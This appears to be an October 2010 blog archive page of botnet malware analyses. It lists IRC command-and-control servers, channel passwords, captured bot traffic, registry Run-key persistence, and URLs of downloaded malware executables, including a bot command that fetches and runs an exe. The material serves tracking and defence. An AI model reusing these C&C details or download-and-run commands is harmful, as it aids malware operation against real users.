Month: October 2010

Remote Host Port Number omgredrum.no-ip.biz 51987 Resolved : [omgredrum.no-ip.biz] To [69.65.19.117] Resolved : [omgredrum.no-ip.biz] To [69.65.19.116] PASS Virus NICK VirUs-aruhtp USER sntmwl “” “pup” :sntmwl Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}] + StubPath = “c:RESTORES-1-5-21-1482476501-1644491937-682003330-1013RedruMx.exe” so thatRead more...

Remote Host Port Number 184.73.209.168 80 204.0.5.41 80 204.0.5.58 80 204.0.5.59 80 207.38.101.12 80 208.43.117.134 80 216.178.38.168 80 63.135.80.58 80 63.135.86.25 80 63.135.86.37 80 205.234.236.32 1234 PASS xxx NICK NEW-[USA|00|P|39592] USER XP-5696 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|39592] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

nice.niceshot.in 67.202.108.130 C&C Server: 67.202.108.130:6567 PASS s1m0n3t4 Server Password: Username: XP-1204 Nickname: [SI|DEU|00|P|86096] Channel: #sucksusb# (Password: c1rc0dus0leil) Channeltopic: :.desfi http://iphoneate.in/salario/yem.exe c:WINDOWScap.exe 1 MODE [SI|USA|00|P|97963] -ix JOIN #update# c1rc0dus0leil PRIVMSG #update# :[Dl]: File download: 84.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_64066.exe @ 84.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|61951] USER XP-8990 * 0 :COMPUTERNAME MODE [SI|USA|00|P|61951] -ix JOINRead more...

Remote Host Port Number 74.208.43.209 5000 JOIN ##[ENG] JOIN #msn# PONG :4DFB1F08 NICK [V2][ENG][COMPUTERNAME]9523 PING :redc00de.no-ip.biz 00000000 | 5041 5353 200D 0A55 7365 7220 6B6B 6B20 | PASS ..User kkk 00000010 | 6B6B 6B20 6B6B 6B20 6B6B 6B20 3A6B 6B6B | kkk kkk kkk :kkk Registry Modifications * The newly created Registry Values are: oRead more...

Remote Host Port Number 77.68.56.80 81 addr: oki.nerashti.net ip: 77.68.56.80 addr: oki.nerashti.net ip: 88.208.209.166 Domain from this criminal lamer is hosted in australia and is strange how they allow botnet use from domains registered on :https://www.melbourneit.com.au/ Here infos about australian hosting: Sales Australian callers: 1300 654 677 Other callers: +61 3 8624 2300 Support AustralianRead more...

Remote Host Port Number 184.73.209.168 80 204.0.5.42 80 204.0.5.56 80 204.0.5.58 80 208.43.117.134 80 216.178.38.103 80 216.178.38.168 80 63.135.86.25 80 63.135.86.30 80 64.208.138.218 80 64.202.102.11 1234 PASS xxx NICK NEW-[USA|00|P|54508] USER XP-6046 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|54508] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

Remote Host Port Number 109.196.130.50 57221 112.78.112.208 80 218.85.133.201 80 MODE #! -ix MODE #Ma -ix USER SP2-668 * 0 :COMPUTERNAME MODE [N00_USA_XP_0519458] @ -ix MODE #dpi -ix There was an outbound traffic produced on port 57221: 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720Read more...

Remote Host Port Number 112.78.112.208 80 208.53.183.113 80 208.53.183.92 80 218.85.133.201 80 74.63.78.27 80 91.212.127.147 80 204.45.85.210 57221 ircd here 204.45.85.218 57221 ircd here 65.55.92.152 25 76.73.36.42 8800 * The data identified by the following URLs was then requested from the remote web server: o http://www.nippon.to/cgi-bin/prxjdg.cgi o http://208.53.183.113/nbf.exe o http://208.53.183.92/usa.exe o http://208.53.183.92/zalz.exe o http://www.cooleasy.com/cgi-bin/prxjdg.cgi oRead more...

Remote Host Port Number 69.42.218.75 8878 USER rmivvghu rmivvghu rmivvghu :tqidsjkg NICK eCTKvLpor MODE eCTKvLpor +xi JOIN #maxi USERHOST eCTKvLpor MODE #maxi +smntu PONG :lols.nope.com Now talking in #maxi Topic On: [ #maxi ] [ =iSPD1SfJVIXS78hku1th2mVmfzMNV0S9vmziKgN8rsXvuchJAAboS1N6d+47GpGRbqNA1Rp5AetxCSFjRLWzVXl+QjkC2RRdv96+K+EeYItTv79hc1MOogFKpvVJaySVa6r7iVsXVKg5yrYAuvJnyLsyg6jDPOI9j1mVNgaT/5a69YtxDR1VP8QeyGS7W3DUZWZwMg1VCaKDreE1KD2kxbZ ] Topic By: [ dbbab ]

Remote Host Port Number 92.241.174.61 6667 NICK {XPUSA345887} JOIN #hack PONG irc.hackers.gov USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA345887} +ix Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “servis.exe” so that servis.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update = “%Temp%service2.exe” Memory Modifications * ThereRead more...